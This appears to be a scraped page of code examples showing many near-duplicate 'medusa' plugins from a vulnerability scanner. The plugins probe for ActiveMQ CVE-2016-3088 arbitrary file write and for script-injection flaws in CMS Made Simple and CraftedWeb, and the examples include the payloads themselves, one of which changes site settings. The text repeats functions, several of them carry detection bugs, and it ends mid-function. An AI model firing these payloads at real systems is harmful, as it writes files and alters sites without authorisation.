Exemplo n.º 1
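def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check a target for the ActiveMQ fileserver file-write issue (CVE-2016-3088).

    PUTs a random marker to ``/fileserver/Medusa.txt`` and then GETs the same
    URL. A 204 answer to the PUT together with the marker in the GET body is
    recorded as a finding through ``ClassCongregation``.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host and port.
        Headers: request headers. They are copied before ``Connection: close``
            is added, so the caller's dict is not modified.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Note:
        No request removes the marker file afterwards. The fixed path and the
        ``@Medusa`` suffix of the uploaded body are constant across runs, which
        makes this probe recognisable in request logs.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        PayloadPoc = "/fileserver/Medusa.txt"
        PayloadUrl = scheme + '://' + url + ':' + str(port)+PayloadPoc
        PayloadCode = ClassCongregation.randoms().result(50)+'@Medusa'
        # Work on a copy so the header change stays local to this check.
        headers = dict(Headers)
        headers["Connection"]="close"

        # The context manager releases the session's connections on every path.
        with requests.session() as s:
            resp = s.put(PayloadUrl, data=PayloadCode, headers=headers, proxies=proxies,timeout=3,verify=False)
            code = resp.status_code
            # NOTE(review): unlike the PUT, this GET does not pass verify=False. Against a host
            # with an untrusted certificate it raises after the file has been written, and the
            # check ends in the error handler without a result.
            resp2=s.get(PayloadUrl, headers=headers,proxies=proxies, timeout=3).text
        if code==204 and resp2.find(PayloadCode)!=-1:
            Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(url, PayloadUrl,PayloadCode)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data
            ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": the plugin name comes from dict.get() and may be None,
        # and concatenating None would raise inside this handler.
        _l=ClassCongregation.ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url),e)  # hand the failure to the error log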
Exemplo n.º 2
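def medusa(**kwargs) -> None:
    """Probe the CMS Made Simple installer page for reflected script injection.

    POSTs installer form fields, with an ``alert(<random marker>)`` image tag
    in ``docroot``, to ``/k/cms/cmsmadesimple/install/index.php``. A 200
    response containing the expected anchor fragment is recorded as a finding.

    Keyword Args:
        Url: base URL of the target; the payload path is appended to it.
        Headers: request headers.
        Proxies: proxy mapping handed to ``requests``.

    All keyword arguments are also forwarded to
    ``ClassCongregation.VulnerabilityDetails``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/k/cms/cmsmadesimple/install/index.php"
        data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert({})%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''.format(
            RD)
        payload_url = url + payload

        resp = requests.post(payload_url,
                             data=data,
                             headers=Headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        code = resp.status_code
        # NOTE(review): the needle below has no "{}" placeholder, so .format(RD)
        # leaves it unchanged and the search is for "alert()" with an empty
        # argument, while the request sent "alert(<marker>)". As written, a
        # match is not tied to this probe's marker.
        if code == 200 and con.find(
                '''<a href="$("<img/src='x'/onerror=alert()>'''.format(
                    RD)) != -1:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp, **kwargs).Write()  # pass the response and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": Url may be absent from kwargs (None) and the
        # plugin name comes from dict.get(); concatenating None would raise
        # inside this handler and hide the original error.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log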
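def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Probe the CMS Made Simple site-preferences form for stored script injection.

    POSTs a site-preferences form to ``/cmsms2.2.7/admin/siteprefs.php`` and
    records a finding when the response is a 200 that contains the random
    marker.

    Args:
        Url: target URL, split into scheme, host and port by
            ``ClassCongregation.UrlProcessing``.
        Headers: request headers, passed to ``requests`` unchanged.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        # NOTE(review): this template is posted as written. Nothing calls .format(RD) on it, so
        # the "{}" in the metadata field goes out literally and the marker searched for below
        # was never part of the request. The form is also a settings update
        # (editsiteprefs=true), i.e. a state-changing request if the target accepts it.
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
        payload_url = scheme + "://" + url +":"+ str(port) + payload

        resp = requests.post(payload_url, data=data,headers=Headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data
            ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": the plugin name comes from dict.get() and may be None,
        # and concatenating None would raise inside this handler.
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url),e)  # hand the failure to the error log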
Exemplo n.º 4
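def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Probe the CMS Made Simple site-preferences form for stored script injection.

    POSTs a site-preferences form to ``/cmsms2.2.7/admin/siteprefs.php`` with a
    locally built header set and records a finding when the response is a 200
    that contains the random marker.

    Args:
        Url: target URL, split into scheme, host and port by
            ``ClassCongregation.UrlProcessing``.
        RandomAgent: value used for the ``User-Agent`` header.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        # NOTE(review): this template is posted as written. Nothing calls .format(RD) on it, so
        # the "{}" in the metadata field goes out literally and the marker searched for below
        # was never part of the request. The form is also a settings update
        # (editsiteprefs=true), i.e. a state-changing request if the target accepts it.
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.post(payload_url, data=data,headers=headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data
            ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": the plugin name comes from dict.get() and may be None,
        # and concatenating None would raise inside this handler.
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url),e)  # hand the failure to the error log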
Exemplo n.º 5
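def medusa(**kwargs) -> None:
    """Check a target for the ActiveMQ fileserver file-write issue (CVE-2016-3088).

    PUTs a random marker to ``<Url>/fileserver/Medusa.txt`` and then GETs the
    same URL. A 204 answer to the PUT together with the marker in the GET body
    is recorded as a finding through ``ClassCongregation``.

    Keyword Args:
        Url: base URL of the target; the payload path is appended to it.
        Headers: request headers; ``Connection: close`` is set on this dict.
        Proxies: proxy mapping handed to ``requests``.

    All keyword arguments are also forwarded to
    ``ClassCongregation.VulnerabilityDetails``.

    Note:
        No request removes the marker file afterwards. The fixed path and the
        ``@Medusa`` suffix of the uploaded body are constant across runs, which
        makes this probe recognisable in request logs.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        PayloadPoc = "/fileserver/Medusa.txt"
        PayloadUrl = url + PayloadPoc
        PayloadCode = ClassCongregation.randoms().result(50) + '@Medusa'
        # NOTE(review): this writes into the dict the caller passed in, so the
        # header stays set for whoever uses that dict next.
        Headers["Connection"] = "close"

        # The context manager releases the session's connections on every path.
        with requests.session() as s:
            resp = s.put(PayloadUrl,
                         data=PayloadCode,
                         headers=Headers,
                         proxies=proxies,
                         timeout=3,
                         verify=False)
            code = resp.status_code
            # NOTE(review): unlike the PUT, this GET does not pass verify=False.
            # Against a host with an untrusted certificate it raises after the
            # file has been written, and the check ends without a result.
            resp2 = s.get(PayloadUrl, headers=Headers, proxies=proxies,
                          timeout=3).text
        if code == 204 and resp2.find(PayloadCode) != -1:
            Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(
                url, PayloadUrl, PayloadCode)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp, **kwargs).Write()  # pass the response and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": Url may be absent from kwargs (None) and the
        # plugin name comes from dict.get(); concatenating None would raise
        # inside this handler and hide the original error.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log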
Exemplo n.º 6
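def medusa(**kwargs) -> None:
    """Probe CraftedWeb's ``notice.php`` for reflected script injection.

    Requests ``/aasp_includes/pages/notice.php`` with an image tag carrying
    ``alert('<random marker>')`` in the ``e`` parameter and records a finding
    when the response is a 200 containing the needle checked below.

    Keyword Args:
        Url: base URL of the target; the payload path is appended to it.
        Headers: request headers.
        Proxies: proxy mapping handed to ``requests``.

    All keyword arguments are also forwarded to
    ``ClassCongregation.VulnerabilityDetails``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(
            RD)
        payload_url = url + payload

        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        # NOTE(review): the request carries an <img ... onerror=alert('marker')>
        # tag, but the needle is a <script>alert(marker)</script> tag that was
        # never sent. A verbatim reflection of the payload does not match it.
        if code == 200 and con.find(
                '<script>alert({})</script>'.format(RD)) != -1:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp, **kwargs).Write()  # pass the response and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": Url may be absent from kwargs (None) and the
        # plugin name comes from dict.get(); concatenating None would raise
        # inside this handler and hide the original error.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log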
Exemplo n.º 7
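def medusa(**kwargs) -> None:
    """Probe the CMS Made Simple module manager for reflected script injection.

    Requests ``/cmsms2.2.7/admin/moduleinterface.php`` with a
    ``<script>alert(<random marker>)</script>`` tag appended to ``m1_version``
    and records a finding when the response is a 200 that contains the same
    tag unchanged.

    Keyword Args:
        Url: base URL of the target; the payload path is appended to it.
        Headers: request headers.
        Proxies: proxy mapping handed to ``requests``.

    All keyword arguments are also forwarded to
    ``ClassCongregation.VulnerabilityDetails``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert({})</script>&m1_filename=Adherents-0.2.6.xml".format(
            RD)
        payload_url = url + payload

        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        # The needle is the whole tag, so an escaped reflection does not match.
        if code == 200 and con.find(
                '<script>alert({})</script>'.format(RD)) != -1:
            Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp, **kwargs).Write()  # pass the response and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": Url may be absent from kwargs (None) and the
        # plugin name comes from dict.get(); concatenating None would raise
        # inside this handler and hide the original error.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log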
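def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Probe CraftedWeb's ``notice.php`` for reflected script injection.

    Requests ``/aasp_includes/pages/notice.php`` with an image tag carrying
    ``alert('<random marker>')`` in the ``e`` parameter and records a finding
    when the response is a 200 containing the needle checked below.

    Args:
        Url: target URL, split into scheme, host and port by
            ``ClassCongregation.UrlProcessing``.
        RandomAgent: value used for the ``User-Agent`` header.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        # NOTE(review): the request carries an <img ... onerror=alert('marker')> tag, but the
        # needle is a <script>alert(marker)</script> tag that was never sent. A verbatim
        # reflection of the payload does not match it.
        if code== 200 and con.find('<script>alert({})</script>'.format(RD)) != -1 :
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass the url and the scan data
            ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": the plugin name comes from dict.get() and may be None,
        # and concatenating None would raise inside this handler.
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url),e)  # hand the failure to the error log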
def medusa(Url,RandomAgent,Token,proxies=None):
    """Probe the CMS Made Simple installer's session test for script injection.

    POSTs a ``default_cms_lang`` value carrying ``alert(<random marker>)`` to
    ``/k/cms/cmsmadesimple/install/index.php?sessiontest=1`` and records a
    finding when the response is a 200 whose body contains the marker.

    Args:
        Url: target URL, split into scheme, host and port by
            ``ClassCongregation.UrlProcessing``.
        RandomAgent: value used for the ``User-Agent`` header.
        Token: passed to ``ClassCongregation.VulnerabilityDetails``.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Only a missing port is defaulted; a parsed port is kept as it is.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        marker = ClassCongregation.randoms().result(20)
        endpoint = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        form_body = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(marker)
        target = scheme + "://" + url + ":" + str(port) + endpoint
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        response = requests.post(
            target,
            data=form_body,
            headers=request_headers,
            proxies=proxies,
            timeout=6,
            verify=False,
        )
        body = response.text
        status = response.status_code
        # NOTE(review): only the bare marker is searched for, so this condition cannot tell an
        # escaped reflection from an unescaped one.
        if status == 200 and body.find(marker) != -1:
            report = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, target, body)
            details = VulnerabilityInfo(report)
            # Record the finding (url plus scan data), then write it to the per-target file.
            ClassCongregation.VulnerabilityDetails(details.info, url, Token).Write()
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # The error log receives the URL and the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
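def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a target for the ActiveMQ fileserver file-write issue (CVE-2016-3088).

    PUTs a random marker to ``/fileserver/Medusa.txt`` and then GETs the same
    URL. A 204 answer to the PUT together with the marker in the GET body is
    recorded as a finding through ``ClassCongregation``.

    Args:
        Url: target URL; ``UrlProcessing`` splits it into scheme, host and port.
        RandomAgent: value used for the ``User-Agent`` header.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.

    Note:
        No request removes the marker file afterwards. The fixed path and the
        ``@Medusa`` suffix of the uploaded body are constant across runs, which
        makes this probe recognisable in request logs.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        PayloadPoc = "/fileserver/Medusa.txt"
        PayloadUrl = scheme + '://' + url + ':' + str(port) + PayloadPoc
        PayloadCode = ClassCongregation.randoms().result(50) + '@Medusa'

        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language':
            'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'User-Agent': RandomAgent,
            'Connection': 'close',
        }
        # The context manager releases the session's connections on every path.
        with requests.session() as s:
            resp = s.put(PayloadUrl,
                         data=PayloadCode,
                         headers=headers,
                         proxies=proxies,
                         timeout=3,
                         verify=False)
            code = resp.status_code
            # NOTE(review): unlike the PUT, this GET does not pass verify=False.
            # Against a host with an untrusted certificate it raises after the
            # file has been written, and the check ends without a result.
            resp2 = s.get(PayloadUrl, headers=headers, proxies=proxies,
                          timeout=3).text
        if code == 204 and resp2.find(PayloadCode) != -1:
            Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(
                url, PayloadUrl, PayloadCode)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # pass the url and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": the plugin name comes from dict.get() and
        # may be None, and concatenating None would raise inside this handler.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log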
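def medusa(**kwargs)->None:
    """Probe the CMS Made Simple installer's session test for script injection.

    POSTs a ``default_cms_lang`` value carrying ``alert(<random marker>)`` to
    ``/k/cms/cmsmadesimple/install/index.php?sessiontest=1`` and records a
    finding when the response is a 200 whose body contains the marker.

    Keyword Args:
        Url: base URL of the target; the payload path is appended to it.
        Headers: request headers.
        Proxies: proxy mapping handed to ``requests``.

    All keyword arguments are also forwarded to
    ``ClassCongregation.VulnerabilityDetails``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD)
        payload_url = url + payload

        resp = requests.post(payload_url, data=data,headers=Headers,proxies=proxies, timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        # NOTE(review): only the bare marker is searched for, so this condition cannot tell an
        # escaped reflection from an unescaped one.
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass the response and the scan data
            ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": Url may be absent from kwargs (None) and the plugin name
        # comes from dict.get(); concatenating None would raise inside this handler and hide
        # the original error.
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url),e)  # hand the failure to the error log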
Exemplo n.º 12
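def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe the CMS Made Simple installer's session test for script injection.

    POSTs a ``default_cms_lang`` value carrying ``alert(<random marker>)`` to
    ``/k/cms/cmsmadesimple/install/index.php?sessiontest=1`` and records a
    finding when the response is a 200 whose body contains the marker.

    Args:
        Url: target URL, split into scheme, host and port by
            ``ClassCongregation.UrlProcessing``.
        Headers: request headers, passed to ``requests`` unchanged.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(
            RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        resp = requests.post(payload_url,
                             data=data,
                             headers=Headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        code = resp.status_code
        # NOTE(review): only the bare marker is searched for, so this condition
        # cannot tell an escaped reflection from an unescaped one.
        if code == 200 and con.find(RD) != -1:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # pass the url and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": the plugin name comes from dict.get() and
        # may be None, and concatenating None would raise inside this handler.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:{} || Target Url:{}".format(_, url), e)  # hand the failure to the error log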
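def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe CraftedWeb's ``notice.php`` for reflected script injection.

    Requests ``/aasp_includes/pages/notice.php`` with an image tag carrying
    ``alert('<random marker>')`` in the ``e`` parameter and records a finding
    when the response is a 200 containing the needle checked below.

    Args:
        Url: target URL, split into scheme, host and port by
            ``ClassCongregation.UrlProcessing``.
        Headers: request headers, passed to ``requests`` unchanged.
        proxies: proxy setting, resolved by ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fall back to the scheme's default port only when none was parsed.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(
            RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        # NOTE(review): the request carries an <img ... onerror=alert('marker')>
        # tag, but the needle is a <script>alert(marker)</script> tag that was
        # never sent. A verbatim reflection of the payload does not match it.
        if code == 200 and con.find(
                '<script>alert({})</script>'.format(RD)) != -1:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # pass the url and the scan data
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the output file, Medusa is the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() rather than "+": the plugin name comes from dict.get() and
        # may be None, and concatenating None would raise inside this handler.
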